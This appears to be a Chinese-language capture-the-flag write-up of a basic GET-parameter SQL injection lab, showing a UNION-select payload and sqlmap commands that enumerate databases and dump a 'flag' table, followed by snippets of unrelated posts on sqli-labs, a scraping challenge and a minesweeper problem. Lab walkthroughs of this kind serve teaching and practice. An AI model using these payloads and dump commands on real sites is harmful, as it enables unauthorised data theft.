第一題:普通的get注入
1.開啟題目頁面
在「id=1」後面鍵入單引號根據錯誤資訊判斷此引數存在注入點並可判斷出後台資料庫為mysql,錯誤資訊如下
檢視發現flag表中存在id,flag兩個字段,接下來檢視字段值。最終得到我們想要的flag。
查詢flag:' union select flag,2,3,4 from flag -- '
對於手工注入的一些問題group_concat的使用可以去:
二、sqlmap工具注入
1.1首先在終端敲入以下命令獲取當前資料庫名稱
sqlmap -u -p gid --current-db
這裡命令意思分別是-u 選取目標 -p 選取測試引數 --current-db查詢資料庫名稱。
2.其次在終端敲入以下命令獲取當前資料庫中**
sqlmap -u -p gid -d pentesterlab --tables
這裡命令是-d要列舉的資料庫。 --tables是查詢當前資料庫的**。
3.最終在終端橋如一下命令獲得flag表單中的資訊:
sqlmap -u -p gid -d pentesterlab -t flag --dump
這裡命令意思是:-t要列舉的資料庫表。 --dump 是轉儲。
sqli labs第一關 詳解
sqli labs第一關 方法一 手工注入 方法二 sqlmap工具 兩種方式,都可以學學,順便學會用sqlmap,也是不錯的。不多說,我們開始吧 方法一 來到第一關,圖上說我們需要乙個數字的引數 於是我們先手工注入?id 1 and 1 1 跟?id 1 and 1 2發現頁面沒有報錯 每張截圖上...
glidedsky爬蟲闖關 第一關
今天無意中發現了乙個練習爬蟲的 做的挺不錯的 強烈推薦 第一關是將網頁中所有的數字相加,因為格式十分整齊,可以用多種方法來實現,一併記錄在這裡了,注意在get的時候要加上在cookie import requests from bs4 import beautifulsoup import refr...
3277 2015 2 掃雷遊戲(基礎第一關)
題目描述 掃雷遊戲是一款十分經典的單機小遊戲。在n行m列的雷區中有一些格仔含有地雷 稱之為地雷格 其他格仔不含地雷 稱之為非地雷格 玩家翻開乙個非地雷格時,該格將會出現乙個數字 提示周圍格仔中有多少個是地雷格。遊戲的目標是在不翻出任何地雷格的條件下,找出所有的非地雷格。現在給出n行m列的雷區中的地雷...